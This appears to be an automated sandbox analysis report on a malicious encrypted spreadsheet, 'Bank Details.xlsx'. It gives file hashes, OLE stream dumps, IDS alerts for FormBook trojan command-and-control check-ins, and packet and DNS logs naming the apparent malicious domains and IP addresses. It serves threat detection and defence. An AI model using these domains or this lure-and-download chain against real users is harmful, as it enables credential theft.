                                                                                                                                                                                                    Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........lJ...$...$...$./.{...$...%.9.$.".y...$.......$.f."...$.Rich..$.........................PE..L.....8E.................\..........f1.......p....@.........................................................................Pt..........g............................................................................p...............................text....[.......\.................. ..`.rdata.......p.......`..............@..@.data....d...........r..............@....ndata...................................rsrc...g............v..............@..@................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                    Static File Info

                                                                                                                                                                                                    General

                                                                                                                                                                                                    File type:CDFV2 Encrypted
                                                                                                                                                                                                    Entropy (8bit):7.996517540980423
                                                                                                                                                                                                    TrID:
                                                                                                                                                                                                    • Generic OLE2 / Multistream Compound File (8008/1) 100.00%
                                                                                                                                                                                                    File name:Bank Details.xlsx
                                                                                                                                                                                                    File size:2370560
                                                                                                                                                                                                    MD5:c8aa551fd4cc3b5d6e87ea3f025fa6f2
                                                                                                                                                                                                    SHA1:3285390c80ccb179471f31cb4552db8802de518c
                                                                                                                                                                                                    SHA256:d22df2dfcfccf5964421ffbbceee8193dc4b6cb6663ea2a3c9687ca57d6779a5
                                                                                                                                                                                                    SHA512:c7647059aa1e3e79a8652cd326eecc09dc3eef5a7b9ec33f803947151973a657c09d3c143874c2de10205ca21168eabc5839599e11c90ea009acb58748f1004d
                                                                                                                                                                                                    SSDEEP:49152:wVVV5zlhInzv53nKjtllZ7uYOg0BkIakbTOWkaBfId3wQjHJ/wJ3p:wx7azvGt7JuBekbCWkKfMZdk5
                                                                                                                                                                                                    File Content Preview:........................>...................%....................................................................................................................................... ...!..."...#.......~...............z......................................

                                                                                                                                                                                                    File Icon

                                                                                                                                                                                                    Icon Hash:e4e2aa8aa4b4bcb4

                                                                                                                                                                                                    Static OLE Info

                                                                                                                                                                                                    General

                                                                                                                                                                                                    Document Type:OLE
                                                                                                                                                                                                    Number of OLE Files:1

                                                                                                                                                                                                    OLE File "Bank Details.xlsx"

                                                                                                                                                                                                    Indicators

                                                                                                                                                                                                    Has Summary Info:False
                                                                                                                                                                                                    Application Name:unknown
                                                                                                                                                                                                    Encrypted Document:True
                                                                                                                                                                                                    Contains Word Document Stream:False
                                                                                                                                                                                                    Contains Workbook/Book Stream:False
                                                                                                                                                                                                    Contains PowerPoint Document Stream:False
                                                                                                                                                                                                    Contains Visio Document Stream:False
                                                                                                                                                                                                    Contains ObjectPool Stream:
                                                                                                                                                                                                    Flash Objects Count:
                                                                                                                                                                                                    Contains VBA Macros:False

                                                                                                                                                                                                    Streams

                                                                                                                                                                                                    Stream Path: \x6DataSpaces/DataSpaceInfo/StrongEncryptionDataSpace, File Type: data, Stream Size: 64
                                                                                                                                                                                                    General
                                                                                                                                                                                                    Stream Path:\x6DataSpaces/DataSpaceInfo/StrongEncryptionDataSpace
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Stream Size:64
                                                                                                                                                                                                    Entropy:2.73637206947
                                                                                                                                                                                                    Base64 Encoded:False
                                                                                                                                                                                                    Data ASCII:. . . . . . . . 2 . . . S . t . r . o . n . g . E . n . c . r . y . p . t . i . o . n . T . r . a . n . s . f . o . r . m . . .
                                                                                                                                                                                                    Data Raw:08 00 00 00 01 00 00 00 32 00 00 00 53 00 74 00 72 00 6f 00 6e 00 67 00 45 00 6e 00 63 00 72 00 79 00 70 00 74 00 69 00 6f 00 6e 00 54 00 72 00 61 00 6e 00 73 00 66 00 6f 00 72 00 6d 00 00 00
                                                                                                                                                                                                    Stream Path: \x6DataSpaces/DataSpaceMap, File Type: data, Stream Size: 112
                                                                                                                                                                                                    General
                                                                                                                                                                                                    Stream Path:\x6DataSpaces/DataSpaceMap
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Stream Size:112
                                                                                                                                                                                                    Entropy:2.7597816111
                                                                                                                                                                                                    Base64 Encoded:False
                                                                                                                                                                                                    Data ASCII:. . . . . . . . h . . . . . . . . . . . . . . E . n . c . r . y . p . t . e . d . P . a . c . k . a . g . e . 2 . . . S . t . r . o . n . g . E . n . c . r . y . p . t . i . o . n . D . a . t . a . S . p . a . c . e . . .
                                                                                                                                                                                                    Data Raw:08 00 00 00 01 00 00 00 68 00 00 00 01 00 00 00 00 00 00 00 20 00 00 00 45 00 6e 00 63 00 72 00 79 00 70 00 74 00 65 00 64 00 50 00 61 00 63 00 6b 00 61 00 67 00 65 00 32 00 00 00 53 00 74 00 72 00 6f 00 6e 00 67 00 45 00 6e 00 63 00 72 00 79 00 70 00 74 00 69 00 6f 00 6e 00 44 00 61 00 74 00 61 00 53 00 70 00 61 00 63 00 65 00 00 00
                                                                                                                                                                                                    Stream Path: \x6DataSpaces/TransformInfo/StrongEncryptionTransform/\x6Primary, File Type: data, Stream Size: 200
                                                                                                                                                                                                    General
                                                                                                                                                                                                    Stream Path:\x6DataSpaces/TransformInfo/StrongEncryptionTransform/\x6Primary
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Stream Size:200
                                                                                                                                                                                                    Entropy:3.13335930328
                                                                                                                                                                                                    Base64 Encoded:False
                                                                                                                                                                                                    Data ASCII:X . . . . . . . L . . . { . F . F . 9 . A . 3 . F . 0 . 3 . - . 5 . 6 . E . F . - . 4 . 6 . 1 . 3 . - . B . D . D . 5 . - . 5 . A . 4 . 1 . C . 1 . D . 0 . 7 . 2 . 4 . 6 . } . N . . . M . i . c . r . o . s . o . f . t . . . C . o . n . t . a . i . n . e . r . . . E . n . c . r . y . p . t . i . o . n . T . r . a . n . s . f . o . r . m . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                                                                                                                                                                                    Data Raw:58 00 00 00 01 00 00 00 4c 00 00 00 7b 00 46 00 46 00 39 00 41 00 33 00 46 00 30 00 33 00 2d 00 35 00 36 00 45 00 46 00 2d 00 34 00 36 00 31 00 33 00 2d 00 42 00 44 00 44 00 35 00 2d 00 35 00 41 00 34 00 31 00 43 00 31 00 44 00 30 00 37 00 32 00 34 00 36 00 7d 00 4e 00 00 00 4d 00 69 00 63 00 72 00 6f 00 73 00 6f 00 66 00 74 00 2e 00 43 00 6f 00 6e 00 74 00 61 00 69 00 6e 00 65 00
                                                                                                                                                                                                    Stream Path: \x6DataSpaces/Version, File Type: data, Stream Size: 76
                                                                                                                                                                                                    General
                                                                                                                                                                                                    Stream Path:\x6DataSpaces/Version
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Stream Size:76
                                                                                                                                                                                                    Entropy:2.79079600998
                                                                                                                                                                                                    Base64 Encoded:False
                                                                                                                                                                                                    Data ASCII:< . . . M . i . c . r . o . s . o . f . t . . . C . o . n . t . a . i . n . e . r . . . D . a . t . a . S . p . a . c . e . s . . . . . . . . . . . . .
                                                                                                                                                                                                    Data Raw:3c 00 00 00 4d 00 69 00 63 00 72 00 6f 00 73 00 6f 00 66 00 74 00 2e 00 43 00 6f 00 6e 00 74 00 61 00 69 00 6e 00 65 00 72 00 2e 00 44 00 61 00 74 00 61 00 53 00 70 00 61 00 63 00 65 00 73 00 01 00 00 00 01 00 00 00 01 00 00 00
                                                                                                                                                                                                    Stream Path: EncryptedPackage, File Type: data, Stream Size: 2347736
                                                                                                                                                                                                    General
                                                                                                                                                                                                    Stream Path:EncryptedPackage
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Stream Size:2347736
                                                                                                                                                                                                    Entropy:7.99971479672
                                                                                                                                                                                                    Base64 Encoded:True
                                                                                                                                                                                                    Data ASCII:. . # . . . . . . . . . . . . ` r . / | # > 3 l . . . . . . . . t . . . d ! / . D . z f . . . x . / x . . . . v . Q c . . . U c . . . & x . w * K E S . . + . . . g . u $ . R Z K E S . . + . . . g . u $ . R Z K E S . . + . . . g . u $ . R Z K E S . . + . . . g . u $ . R Z K E S . . + . . . g . u $ . R Z K E S . . + . . . g . u $ . R Z K E S . . + . . . g . u $ . R Z K E S . . + . . . g . u $ . R Z K E S . . + . . . g . u $ . R Z K E S . . + . . . g . u $ . R Z K E S . . + . . . g . u $ . R Z K E S . . + . .
                                                                                                                                                                                                    Data Raw:cb d2 23 00 00 00 00 00 9a 95 f5 1a 85 83 e3 60 72 96 2f 7c 23 3e 33 6c c6 0f c8 f5 93 fc ff 87 74 1c d7 89 64 21 2f d5 44 ab 7a 66 e2 a7 00 78 03 2f 78 af a9 cb af 76 e9 51 63 97 0a 83 55 63 fa 9c eb 26 78 90 77 2a 4b 45 53 e6 99 2b b9 1d fa 67 fc 75 24 2e 52 5a 4b 45 53 e6 99 2b b9 1d fa 67 fc 75 24 2e 52 5a 4b 45 53 e6 99 2b b9 1d fa 67 fc 75 24 2e 52 5a 4b 45 53 e6 99 2b b9 1d
                                                                                                                                                                                                    Stream Path: EncryptionInfo, File Type: data, Stream Size: 224
                                                                                                                                                                                                    General
                                                                                                                                                                                                    Stream Path:EncryptionInfo
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Stream Size:224
                                                                                                                                                                                                    Entropy:4.49244460605
                                                                                                                                                                                                    Base64 Encoded:False
                                                                                                                                                                                                    Data ASCII:. . . . $ . . . . . . . $ . . . . . . . . f . . . . . . . . . . . . . . . . . . . . . . M . i . c . r . o . s . o . f . t . . E . n . h . a . n . c . e . d . . R . S . A . . a . n . d . . A . E . S . . C . r . y . p . t . o . g . r . a . p . h . i . c . . P . r . o . v . i . d . e . r . . . . . . . . . . ; . g . . . i . 2 . . # 6 # B t . . . . D . < { k T I . . . . . . . ? . . . t . p . . . . . . . . . . . . s . . . . . . . . . . .
                                                                                                                                                                                                    Data Raw:04 00 02 00 24 00 00 00 8c 00 00 00 24 00 00 00 00 00 00 00 0e 66 00 00 04 80 00 00 80 00 00 00 18 00 00 00 00 00 00 00 00 00 00 00 4d 00 69 00 63 00 72 00 6f 00 73 00 6f 00 66 00 74 00 20 00 45 00 6e 00 68 00 61 00 6e 00 63 00 65 00 64 00 20 00 52 00 53 00 41 00 20 00 61 00 6e 00 64 00 20 00 41 00 45 00 53 00 20 00 43 00 72 00 79 00 70 00 74 00 6f 00 67 00 72 00 61 00 70 00 68 00

                                                                                                                                                                                                    Network Behavior

                                                                                                                                                                                                    Snort IDS Alerts

                                                                                                                                                                                                    TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                                                                                                                                                                                    04/12/21-11:39:06.563976TCP2031453ET TROJAN FormBook CnC Checkin (GET)4917180192.168.2.2234.102.136.180
                                                                                                                                                                                                    04/12/21-11:39:06.563976TCP2031449ET TROJAN FormBook CnC Checkin (GET)4917180192.168.2.2234.102.136.180
                                                                                                                                                                                                    04/12/21-11:39:06.563976TCP2031412ET TROJAN FormBook CnC Checkin (GET)4917180192.168.2.2234.102.136.180
                                                                                                                                                                                                    04/12/21-11:39:06.765571TCP1201ATTACK-RESPONSES 403 Forbidden804917134.102.136.180192.168.2.22
                                                                                                                                                                                                    04/12/21-11:39:49.934220TCP2031453ET TROJAN FormBook CnC Checkin (GET)4917780192.168.2.223.230.51.235
                                                                                                                                                                                                    04/12/21-11:39:49.934220TCP2031449ET TROJAN FormBook CnC Checkin (GET)4917780192.168.2.223.230.51.235
                                                                                                                                                                                                    04/12/21-11:39:49.934220TCP2031412ET TROJAN FormBook CnC Checkin (GET)4917780192.168.2.223.230.51.235

                                                                                                                                                                                                    Network Port Distribution

                                                                                                                                                                                                    TCP Packets

                                                                                                                                                                                                    TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                                                    Apr 12, 2021 11:38:06.504285097 CEST49167443192.168.2.2252.59.165.42
                                                                                                                                                                                                    Apr 12, 2021 11:38:06.547945023 CEST4434916752.59.165.42192.168.2.22
                                                                                                                                                                                                    Apr 12, 2021 11:38:06.548108101 CEST49167443192.168.2.2252.59.165.42
                                                                                                                                                                                                    Apr 12, 2021 11:38:06.562624931 CEST49167443192.168.2.2252.59.165.42
                                                                                                                                                                                                    Apr 12, 2021 11:38:06.604636908 CEST4434916752.59.165.42192.168.2.22
                                                                                                                                                                                                    Apr 12, 2021 11:38:06.606322050 CEST4434916752.59.165.42192.168.2.22
                                                                                                                                                                                                    Apr 12, 2021 11:38:06.606375933 CEST4434916752.59.165.42192.168.2.22
                                                                                                                                                                                                    Apr 12, 2021 11:38:06.606409073 CEST4434916752.59.165.42192.168.2.22
                                                                                                                                                                                                    Apr 12, 2021 11:38:06.606415033 CEST49167443192.168.2.2252.59.165.42
                                                                                                                                                                                                    Apr 12, 2021 11:38:06.606452942 CEST49167443192.168.2.2252.59.165.42
                                                                                                                                                                                                    Apr 12, 2021 11:38:06.606456041 CEST49167443192.168.2.2252.59.165.42
                                                                                                                                                                                                    Apr 12, 2021 11:38:06.615592957 CEST49167443192.168.2.2252.59.165.42
                                                                                                                                                                                                    Apr 12, 2021 11:38:06.657550097 CEST4434916752.59.165.42192.168.2.22
                                                                                                                                                                                                    Apr 12, 2021 11:38:06.657638073 CEST49167443192.168.2.2252.59.165.42
                                                                                                                                                                                                    Apr 12, 2021 11:38:08.318805933 CEST49167443192.168.2.2252.59.165.42
                                                                                                                                                                                                    Apr 12, 2021 11:38:08.375102997 CEST4434916752.59.165.42192.168.2.22
                                                                                                                                                                                                    Apr 12, 2021 11:38:08.375181913 CEST49167443192.168.2.2252.59.165.42
                                                                                                                                                                                                    Apr 12, 2021 11:38:08.444669962 CEST4917080192.168.2.22103.141.138.117
                                                                                                                                                                                                    Apr 12, 2021 11:38:08.699580908 CEST8049170103.141.138.117192.168.2.22
                                                                                                                                                                                                    Apr 12, 2021 11:38:08.700056076 CEST4917080192.168.2.22103.141.138.117
                                                                                                                                                                                                    Apr 12, 2021 11:38:08.700448990 CEST4917080192.168.2.22103.141.138.117
                                                                                                                                                                                                    Apr 12, 2021 11:38:08.963999033 CEST8049170103.141.138.117192.168.2.22
                                                                                                                                                                                                    Apr 12, 2021 11:38:08.964063883 CEST8049170103.141.138.117192.168.2.22
                                                                                                                                                                                                    Apr 12, 2021 11:38:08.964097977 CEST4917080192.168.2.22103.141.138.117
                                                                                                                                                                                                    Apr 12, 2021 11:38:08.964113951 CEST8049170103.141.138.117192.168.2.22
                                                                                                                                                                                                    Apr 12, 2021 11:38:08.964126110 CEST4917080192.168.2.22103.141.138.117
                                                                                                                                                                                                    Apr 12, 2021 11:38:08.964154005 CEST8049170103.141.138.117192.168.2.22
                                                                                                                                                                                                    Apr 12, 2021 11:38:08.964209080 CEST4917080192.168.2.22103.141.138.117
                                                                                                                                                                                                    Apr 12, 2021 11:38:09.218404055 CEST8049170103.141.138.117192.168.2.22
                                                                                                                                                                                                    Apr 12, 2021 11:38:09.218450069 CEST8049170103.141.138.117192.168.2.22
                                                                                                                                                                                                    Apr 12, 2021 11:38:09.218488932 CEST8049170103.141.138.117192.168.2.22
                                                                                                                                                                                                    Apr 12, 2021 11:38:09.218527079 CEST8049170103.141.138.117192.168.2.22
                                                                                                                                                                                                    Apr 12, 2021 11:38:09.218565941 CEST4917080192.168.2.22103.141.138.117
                                                                                                                                                                                                    Apr 12, 2021 11:38:09.218591928 CEST4917080192.168.2.22103.141.138.117
                                                                                                                                                                                                    Apr 12, 2021 11:38:09.218594074 CEST4917080192.168.2.22103.141.138.117
                                                                                                                                                                                                    Apr 12, 2021 11:38:09.218648911 CEST8049170103.141.138.117192.168.2.22
                                                                                                                                                                                                    Apr 12, 2021 11:38:09.218692064 CEST4917080192.168.2.22103.141.138.117
                                                                                                                                                                                                    Apr 12, 2021 11:38:09.218693018 CEST8049170103.141.138.117192.168.2.22
                                                                                                                                                                                                    Apr 12, 2021 11:38:09.218729973 CEST4917080192.168.2.22103.141.138.117
                                                                                                                                                                                                    Apr 12, 2021 11:38:09.218730927 CEST8049170103.141.138.117192.168.2.22
                                                                                                                                                                                                    Apr 12, 2021 11:38:09.218774080 CEST4917080192.168.2.22103.141.138.117
                                                                                                                                                                                                    Apr 12, 2021 11:38:09.218779087 CEST8049170103.141.138.117192.168.2.22
                                                                                                                                                                                                    Apr 12, 2021 11:38:09.218813896 CEST4917080192.168.2.22103.141.138.117
                                                                                                                                                                                                    Apr 12, 2021 11:38:09.474692106 CEST8049170103.141.138.117192.168.2.22
                                                                                                                                                                                                    Apr 12, 2021 11:38:09.474750996 CEST8049170103.141.138.117192.168.2.22
                                                                                                                                                                                                    Apr 12, 2021 11:38:09.474792004 CEST8049170103.141.138.117192.168.2.22
                                                                                                                                                                                                    Apr 12, 2021 11:38:09.474828959 CEST8049170103.141.138.117192.168.2.22
                                                                                                                                                                                                    Apr 12, 2021 11:38:09.474849939 CEST4917080192.168.2.22103.141.138.117
                                                                                                                                                                                                    Apr 12, 2021 11:38:09.474877119 CEST8049170103.141.138.117192.168.2.22
                                                                                                                                                                                                    Apr 12, 2021 11:38:09.474889994 CEST4917080192.168.2.22103.141.138.117
                                                                                                                                                                                                    Apr 12, 2021 11:38:09.474895954 CEST4917080192.168.2.22103.141.138.117
                                                                                                                                                                                                    Apr 12, 2021 11:38:09.474900007 CEST4917080192.168.2.22103.141.138.117
                                                                                                                                                                                                    Apr 12, 2021 11:38:09.474919081 CEST8049170103.141.138.117192.168.2.22
                                                                                                                                                                                                    Apr 12, 2021 11:38:09.474920034 CEST4917080192.168.2.22103.141.138.117
                                                                                                                                                                                                    Apr 12, 2021 11:38:09.474956989 CEST8049170103.141.138.117192.168.2.22
                                                                                                                                                                                                    Apr 12, 2021 11:38:09.474966049 CEST4917080192.168.2.22103.141.138.117
                                                                                                                                                                                                    Apr 12, 2021 11:38:09.474992037 CEST4917080192.168.2.22103.141.138.117
                                                                                                                                                                                                    Apr 12, 2021 11:38:09.474994898 CEST8049170103.141.138.117192.168.2.22
                                                                                                                                                                                                    Apr 12, 2021 11:38:09.475033045 CEST8049170103.141.138.117192.168.2.22
                                                                                                                                                                                                    Apr 12, 2021 11:38:09.475071907 CEST8049170103.141.138.117192.168.2.22
                                                                                                                                                                                                    Apr 12, 2021 11:38:09.475112915 CEST8049170103.141.138.117192.168.2.22
                                                                                                                                                                                                    Apr 12, 2021 11:38:09.475152016 CEST8049170103.141.138.117192.168.2.22
                                                                                                                                                                                                    Apr 12, 2021 11:38:09.475151062 CEST4917080192.168.2.22103.141.138.117
                                                                                                                                                                                                    Apr 12, 2021 11:38:09.475199938 CEST8049170103.141.138.117192.168.2.22
                                                                                                                                                                                                    Apr 12, 2021 11:38:09.475207090 CEST4917080192.168.2.22103.141.138.117
                                                                                                                                                                                                    Apr 12, 2021 11:38:09.475241899 CEST4917080192.168.2.22103.141.138.117
                                                                                                                                                                                                    Apr 12, 2021 11:38:09.475244045 CEST8049170103.141.138.117192.168.2.22
                                                                                                                                                                                                    Apr 12, 2021 11:38:09.475246906 CEST4917080192.168.2.22103.141.138.117
                                                                                                                                                                                                    Apr 12, 2021 11:38:09.475250959 CEST4917080192.168.2.22103.141.138.117
                                                                                                                                                                                                    Apr 12, 2021 11:38:09.475276947 CEST4917080192.168.2.22103.141.138.117
                                                                                                                                                                                                    Apr 12, 2021 11:38:09.475281954 CEST4917080192.168.2.22103.141.138.117
                                                                                                                                                                                                    Apr 12, 2021 11:38:09.475281954 CEST8049170103.141.138.117192.168.2.22
                                                                                                                                                                                                    Apr 12, 2021 11:38:09.475322962 CEST8049170103.141.138.117192.168.2.22
                                                                                                                                                                                                    Apr 12, 2021 11:38:09.475323915 CEST4917080192.168.2.22103.141.138.117
                                                                                                                                                                                                    Apr 12, 2021 11:38:09.475369930 CEST4917080192.168.2.22103.141.138.117
                                                                                                                                                                                                    Apr 12, 2021 11:38:09.475611925 CEST4917080192.168.2.22103.141.138.117
                                                                                                                                                                                                    Apr 12, 2021 11:38:09.729712963 CEST8049170103.141.138.117192.168.2.22
                                                                                                                                                                                                    Apr 12, 2021 11:38:09.729774952 CEST8049170103.141.138.117192.168.2.22
                                                                                                                                                                                                    Apr 12, 2021 11:38:09.729816914 CEST8049170103.141.138.117192.168.2.22
                                                                                                                                                                                                    Apr 12, 2021 11:38:09.729859114 CEST8049170103.141.138.117192.168.2.22
                                                                                                                                                                                                    Apr 12, 2021 11:38:09.729907036 CEST8049170103.141.138.117192.168.2.22
                                                                                                                                                                                                    Apr 12, 2021 11:38:09.729942083 CEST4917080192.168.2.22103.141.138.117
                                                                                                                                                                                                    Apr 12, 2021 11:38:09.729949951 CEST8049170103.141.138.117192.168.2.22
                                                                                                                                                                                                    Apr 12, 2021 11:38:09.729984999 CEST4917080192.168.2.22103.141.138.117
                                                                                                                                                                                                    Apr 12, 2021 11:38:09.729988098 CEST8049170103.141.138.117192.168.2.22
                                                                                                                                                                                                    Apr 12, 2021 11:38:09.729990959 CEST4917080192.168.2.22103.141.138.117
                                                                                                                                                                                                    Apr 12, 2021 11:38:09.729995012 CEST4917080192.168.2.22103.141.138.117
                                                                                                                                                                                                    Apr 12, 2021 11:38:09.729999065 CEST4917080192.168.2.22103.141.138.117
                                                                                                                                                                                                    Apr 12, 2021 11:38:09.730021000 CEST4917080192.168.2.22103.141.138.117
                                                                                                                                                                                                    Apr 12, 2021 11:38:09.730027914 CEST8049170103.141.138.117192.168.2.22
                                                                                                                                                                                                    Apr 12, 2021 11:38:09.730034113 CEST4917080192.168.2.22103.141.138.117
                                                                                                                                                                                                    Apr 12, 2021 11:38:09.730068922 CEST8049170103.141.138.117192.168.2.22
                                                                                                                                                                                                    Apr 12, 2021 11:38:09.730086088 CEST4917080192.168.2.22103.141.138.117
                                                                                                                                                                                                    Apr 12, 2021 11:38:09.730113029 CEST8049170103.141.138.117192.168.2.22
                                                                                                                                                                                                    Apr 12, 2021 11:38:09.730118036 CEST4917080192.168.2.22103.141.138.117
                                                                                                                                                                                                    Apr 12, 2021 11:38:09.730151892 CEST8049170103.141.138.117192.168.2.22
                                                                                                                                                                                                    Apr 12, 2021 11:38:09.730161905 CEST4917080192.168.2.22103.141.138.117
                                                                                                                                                                                                    Apr 12, 2021 11:38:09.730191946 CEST8049170103.141.138.117192.168.2.22
                                                                                                                                                                                                    Apr 12, 2021 11:38:09.730195999 CEST4917080192.168.2.22103.141.138.117
                                                                                                                                                                                                    Apr 12, 2021 11:38:09.730237961 CEST8049170103.141.138.117192.168.2.22

                                                                                                                                                                                                    UDP Packets

                                                                                                                                                                                                    TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                                                    Apr 12, 2021 11:38:06.374515057 CEST5219753192.168.2.228.8.8.8
                                                                                                                                                                                                    Apr 12, 2021 11:38:06.434493065 CEST53521978.8.8.8192.168.2.22
                                                                                                                                                                                                    Apr 12, 2021 11:38:06.434851885 CEST5219753192.168.2.228.8.8.8
                                                                                                                                                                                                    Apr 12, 2021 11:38:06.483635902 CEST53521978.8.8.8192.168.2.22
                                                                                                                                                                                                    Apr 12, 2021 11:38:06.964183092 CEST5309953192.168.2.228.8.8.8
                                                                                                                                                                                                    Apr 12, 2021 11:38:07.014790058 CEST53530998.8.8.8192.168.2.22
                                                                                                                                                                                                    Apr 12, 2021 11:38:07.019026041 CEST5283853192.168.2.228.8.8.8
                                                                                                                                                                                                    Apr 12, 2021 11:38:07.071655989 CEST53528388.8.8.8192.168.2.22
                                                                                                                                                                                                    Apr 12, 2021 11:38:07.072000980 CEST5283853192.168.2.228.8.8.8
                                                                                                                                                                                                    Apr 12, 2021 11:38:07.124825954 CEST53528388.8.8.8192.168.2.22
                                                                                                                                                                                                    Apr 12, 2021 11:38:07.651319027 CEST6120053192.168.2.228.8.8.8
                                                                                                                                                                                                    Apr 12, 2021 11:38:07.710381031 CEST53612008.8.8.8192.168.2.22
                                                                                                                                                                                                    Apr 12, 2021 11:38:07.714406013 CEST4954853192.168.2.228.8.8.8
                                                                                                                                                                                                    Apr 12, 2021 11:38:07.775949955 CEST53495488.8.8.8192.168.2.22
                                                                                                                                                                                                    Apr 12, 2021 11:38:08.381283045 CEST5562753192.168.2.228.8.8.8
                                                                                                                                                                                                    Apr 12, 2021 11:38:08.443428993 CEST53556278.8.8.8192.168.2.22
                                                                                                                                                                                                    Apr 12, 2021 11:39:06.429984093 CEST5600953192.168.2.228.8.8.8
                                                                                                                                                                                                    Apr 12, 2021 11:39:06.504992008 CEST53560098.8.8.8192.168.2.22
                                                                                                                                                                                                    Apr 12, 2021 11:39:11.769948959 CEST6186553192.168.2.228.8.8.8
                                                                                                                                                                                                    Apr 12, 2021 11:39:11.853673935 CEST53618658.8.8.8192.168.2.22
                                                                                                                                                                                                    Apr 12, 2021 11:39:16.996161938 CEST5517153192.168.2.228.8.8.8
                                                                                                                                                                                                    Apr 12, 2021 11:39:17.081425905 CEST53551718.8.8.8192.168.2.22
                                                                                                                                                                                                    Apr 12, 2021 11:39:22.516691923 CEST5249653192.168.2.228.8.8.8
                                                                                                                                                                                                    Apr 12, 2021 11:39:22.846026897 CEST53524968.8.8.8192.168.2.22
                                                                                                                                                                                                    Apr 12, 2021 11:39:28.244251013 CEST5756453192.168.2.228.8.8.8
                                                                                                                                                                                                    Apr 12, 2021 11:39:28.367567062 CEST53575648.8.8.8192.168.2.22
                                                                                                                                                                                                    Apr 12, 2021 11:39:33.376782894 CEST6300953192.168.2.228.8.8.8
                                                                                                                                                                                                    Apr 12, 2021 11:39:33.467981100 CEST53630098.8.8.8192.168.2.22
                                                                                                                                                                                                    Apr 12, 2021 11:39:38.502017021 CEST5931953192.168.2.228.8.8.8
                                                                                                                                                                                                    Apr 12, 2021 11:39:38.585093975 CEST53593198.8.8.8192.168.2.22
                                                                                                                                                                                                    Apr 12, 2021 11:39:43.736958981 CEST5307053192.168.2.228.8.8.8
                                                                                                                                                                                                    Apr 12, 2021 11:39:44.127324104 CEST53530708.8.8.8192.168.2.22
                                                                                                                                                                                                    Apr 12, 2021 11:39:49.601315975 CEST5977053192.168.2.228.8.8.8
                                                                                                                                                                                                    Apr 12, 2021 11:39:49.805474997 CEST53597708.8.8.8192.168.2.22

                                                                                                                                                                                                    DNS Queries

                                                                                                                                                                                                    TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                                                                                                                                                                                    Apr 12, 2021 11:38:06.374515057 CEST192.168.2.228.8.8.80x7f6Standard query (0)fqe.short.gyA (IP address)IN (0x0001)
                                                                                                                                                                                                    Apr 12, 2021 11:38:06.434851885 CEST192.168.2.228.8.8.80x7f6Standard query (0)fqe.short.gyA (IP address)IN (0x0001)
                                                                                                                                                                                                    Apr 12, 2021 11:38:08.381283045 CEST192.168.2.228.8.8.80x6779Standard query (0)stdypmrimelimtewsosq.dns.armyA (IP address)IN (0x0001)
                                                                                                                                                                                                    Apr 12, 2021 11:39:06.429984093 CEST192.168.2.228.8.8.80xa14dStandard query (0)www.playfulpainters.comA (IP address)IN (0x0001)
                                                                                                                                                                                                    Apr 12, 2021 11:39:11.769948959 CEST192.168.2.228.8.8.80xccffStandard query (0)www.hostvngiare.comA (IP address)IN (0x0001)
                                                                                                                                                                                                    Apr 12, 2021 11:39:16.996161938 CEST192.168.2.228.8.8.80x2f03Standard query (0)www.thesixteenthround.netA (IP address)IN (0x0001)
                                                                                                                                                                                                    Apr 12, 2021 11:39:22.516691923 CEST192.168.2.228.8.8.80x3c4eStandard query (0)www.qcmax.comA (IP address)IN (0x0001)
                                                                                                                                                                                                    Apr 12, 2021 11:39:28.244251013 CEST192.168.2.228.8.8.80x6ec7Standard query (0)www.stone-master.infoA (IP address)IN (0x0001)
                                                                                                                                                                                                    Apr 12, 2021 11:39:33.376782894 CEST192.168.2.228.8.8.80xf09aStandard query (0)www.thunderoffroadresort.comA (IP address)IN (0x0001)
                                                                                                                                                                                                    Apr 12, 2021 11:39:38.502017021 CEST192.168.2.228.8.8.80x18f7Standard query (0)www.christlicheliebe.netA (IP address)IN (0x0001)
                                                                                                                                                                                                    Apr 12, 2021 11:39:43.736958981 CEST192.168.2.228.8.8.80x4b93Standard query (0)www.18598853855.comA (IP address)IN (0x0001)
                                                                                                                                                                                                    Apr 12, 2021 11:39:49.601315975 CEST192.168.2.228.8.8.80x9e1cStandard query (0)www.starr2021.comA (IP address)IN (0x0001)

                                                                                                                                                                                                    DNS Answers

                                                                                                                                                                                                    TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                                                                                                                                                                                    Apr 12, 2021 11:38:06.434493065 CEST8.8.8.8192.168.2.220x7f6No error (0)fqe.short.gy52.59.165.42A (IP address)IN (0x0001)
                                                                                                                                                                                                    Apr 12, 2021 11:38:06.434493065 CEST8.8.8.8192.168.2.220x7f6No error (0)fqe.short.gy18.184.197.212A (IP address)IN (0x0001)
                                                                                                                                                                                                    Apr 12, 2021 11:38:06.483635902 CEST8.8.8.8192.168.2.220x7f6No error (0)fqe.short.gy52.59.165.42A (IP address)IN (0x0001)
                                                                                                                                                                                                    Apr 12, 2021 11:38:06.483635902 CEST8.8.8.8192.168.2.220x7f6No error (0)fqe.short.gy18.184.197.212A (IP address)IN (0x0001)
                                                                                                                                                                                                    Apr 12, 2021 11:38:08.443428993 CEST8.8.8.8192.168.2.220x6779No error (0)stdypmrimelimtewsosq.dns.army103.141.138.117A (IP address)IN (0x0001)
                                                                                                                                                                                                    Apr 12, 2021 11:39:06.504992008 CEST8.8.8.8192.168.2.220xa14dNo error (0)www.playfulpainters.complayfulpainters.comCNAME (Canonical name)IN (0x0001)
                                                                                                                                                                                                    Apr 12, 2021 11:39:06.504992008 CEST8.8.8.8192.168.2.220xa14dNo error (0)playfulpainters.com34.102.136.180A (IP address)IN (0x0001)
                                                                                                                                                                                                    Apr 12, 2021 11:39:11.853673935 CEST8.8.8.8192.168.2.220xccffNo error (0)www.hostvngiare.com104.21.71.76A (IP address)IN (0x0001)
                                                                                                                                                                                                    Apr 12, 2021 11:39:11.853673935 CEST8.8.8.8192.168.2.220xccffNo error (0)www.hostvngiare.com172.67.143.231A (IP address)IN (0x0001)
